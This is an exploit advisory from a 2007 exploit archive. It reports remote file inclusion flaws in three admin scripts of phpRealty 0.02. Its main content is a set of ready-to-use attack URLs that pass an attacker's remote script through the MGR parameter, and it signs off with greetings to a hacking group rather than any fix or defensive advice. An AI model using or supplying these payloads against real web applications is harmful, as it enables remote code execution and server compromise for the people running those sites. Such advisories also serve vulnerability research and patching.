phpRealty 0.02 (MGR) Multiple Remote File Inclusion Vulnerabilities

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : phpRealty 0.02 (MGR) Multiple Remote File Inclusion Vulnerabilities
# Published : 2007-09-10
# Author : QTRinux
# Previous Title : Sisfo Kampus 2006 (dwoprn.php f) Remote File Download Vulnerability
# Next Title : AuraCMS 2.1 Remote File Attachment / LFI Vulnerabilities

|-------------------------------------------------------------------------------|
| |
| phpRealty 0.02  (MGR) Remote File include |
| |
| Script : phpRealty |
| Version : 0.02 |
| Authord : QTRinux |
| Contact : Qataro [at] hotmail [dot] com |
| Vendor : http://phprealty.budissy.com/phprealty/v0.02/ |
| DorK :   :(
|-------------------------------------------------------------------------------|
| Bug in : |
| manager/admin/index.php |
| manager/admin/p_ins.php  |
| manager/admin/u_ins.php  |
|-------------------------------------------------------------------------------|
| EXPLOIT : |
| |
| http://localhost/[ Path ]/manager/admin/index.php?MGR=[evilscript] |
| http://localhost/[ Path ]/manager/admin/p_ins.php?MGR=[evilscript] |
| http://localhost/[ Path ]/manager/admin/u_ins.php?MGR=[evilscript] |
|-------------------------------------------------------------------------------|
| Greetz : AlQaTaR!,MR.SH4R3S,Mo0oTeC,MaZaGi, |
| |
---------------------[ [Qatar Security Team] ]-------------------------

# www.Syue.com [2007-09-10]